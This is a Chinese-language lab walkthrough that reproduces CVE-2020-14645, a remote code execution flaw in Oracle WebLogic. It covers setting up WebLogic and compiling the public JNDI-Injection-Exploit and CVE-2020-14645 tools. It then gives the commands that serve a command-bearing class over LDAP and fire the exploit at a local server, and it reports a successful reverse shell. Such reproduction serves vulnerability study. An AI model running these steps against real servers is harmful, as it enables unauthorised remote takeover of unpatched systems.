Skip to content

Latest commit

 

History

History
187 lines (63 loc) · 4.92 KB

Weblogic远程代码执行漏洞(CVE-2020-14645).md

File metadata and controls

187 lines (63 loc) · 4.92 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

正文共: 1453字 17图

预计阅读时间:4分钟

简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

攻击者可利用漏洞实现远程代码执行。

影响版本

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

复现环境

下载JDK 6u211/7u201/8u191任意版本并配置环境变量

本人用的jdk8(下载地址:

https://mega.nz/file/1KIhjSCR#g0s5jekk3F9t55o3WXK_ahozuqn9_60eKSKt70we_uw)

WebLogic 12.2.1.4官方下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

安装

图片

一直点下一步,勾选自助启动配置向导选项

图片

进入配置向导,创建新域并勾选全部模板

图片

图片

安装成功后,使用cd跳到base_domain目录下

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

运行startWebLogic.cmd

图片

浏览器访问http://IP:7001/console/login/LoginForm.jsp

图片

使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件

JNDI工具下载地址:

https://github.com/welk1n/JNDI-Injection-Exploit

下载完成后进入目录编译

cd JNDI-Injection-Exploit

mvn clean package -DskipTests

图片

图片

编译的时间比较久,需要多等会(我在进行编译的时候,花了很久时间,是Maven源没更换导致的)

编译完成后进入target,使用命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

图片

然后使用CVE-2020-14645漏洞验证工具

下载地址:https://github.com/DSO-Lab/defvul(推荐使用镜像地址:https://github.com.cnpmjs.org/DSO-Lab/defvul)

进入CVE-2020-14645_Weblogic目录下进行编译

图片

因为我kali中的jdk版本为11,该漏洞验证工具需要的jdk版本为1.8;于是我又屁颠屁颠在ubuntu上装java,装mvn;开始编译

图片

编译成功:

图片

然后进入target

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit 

http://192.168.31.107:7001

图片

成功反弹

图片

图片

图片

END

扫描二维码

获取更多精彩

图片